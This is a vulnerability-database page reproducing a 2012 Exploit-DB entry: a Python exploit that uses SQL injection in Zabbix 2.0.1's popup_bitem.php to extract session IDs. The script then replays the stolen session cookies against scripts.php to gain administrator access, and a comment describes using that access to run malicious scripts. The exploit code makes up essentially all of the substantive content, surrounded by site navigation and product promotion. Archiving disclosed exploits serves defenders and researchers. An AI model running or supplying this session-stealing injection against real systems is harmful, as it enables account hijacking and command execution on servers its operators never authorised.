Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Zabbix 2.0.1 - Session Extractor

🗓️ 24 Jul 2012 00:00:00Reported by mutsType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 42 Views

Zabbix 2.0.1 Session Extractor vulnerability reported for version 2.0.2 and fixe

Code
#!/usr/bin/python

import re
import sys,urllib2,urllib

print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
print "[*] http://www.offensive-security.com"
print "##################################\n"

''' 

The sessions found by this tool may allow you to access the scripts.php file.
Through this web interface, an administrator can define new malicious scripts. 
These scripts can then be called from the maps area, and executed with "zabbix" permissions.

Timeline:

17 Jul 2012: Vulnerabilty reported
17 Jul 2012: Reply received
18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
19 Jul 2012: Fixed for inclusion in version 2.0.2

'''

ip="172.16.164.150"

target = 'http://%s/zabbix/popup_bitem.php' % ip
url = 'http://%s/zabbix/scripts.php' % ip

def sendSql(num):
        global target
        payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
        payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
        values = {'dstfrm':'1','itemid':payload }
        url = "%s?%s" % (target, urllib.urlencode(values))  
        req = urllib2.Request(url)                          
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        return data

def normal(cookie):
	global url
        req = urllib2.Request(url)
        cook = "zbx_sessionid=%s" %cookie
        req.add_header('Cookie', cook)
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
                return "FAIL"
        else:
                return "SUCCESS"

sessions=[]

for m in range(1,2):
	print "[*] Searching sessions belonging to id %s" % m
        hola=sendSql(m)
        for l in re.findall(r"([a-fA-F\d]{32})", hola):
		if l not in sessions:
			sessions.append(l)
	                print "[*] Found sessionid %s - %s" % (l,normal(l))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4
zabbix2.0.1session extractorvulnerabilityreportedversion 2.0.2fixedweb interfaceadministratormalicious scriptsmaps areazabbixpermissions17 jul 2012reply received18 jul 2012issue opened19 jul 2012
42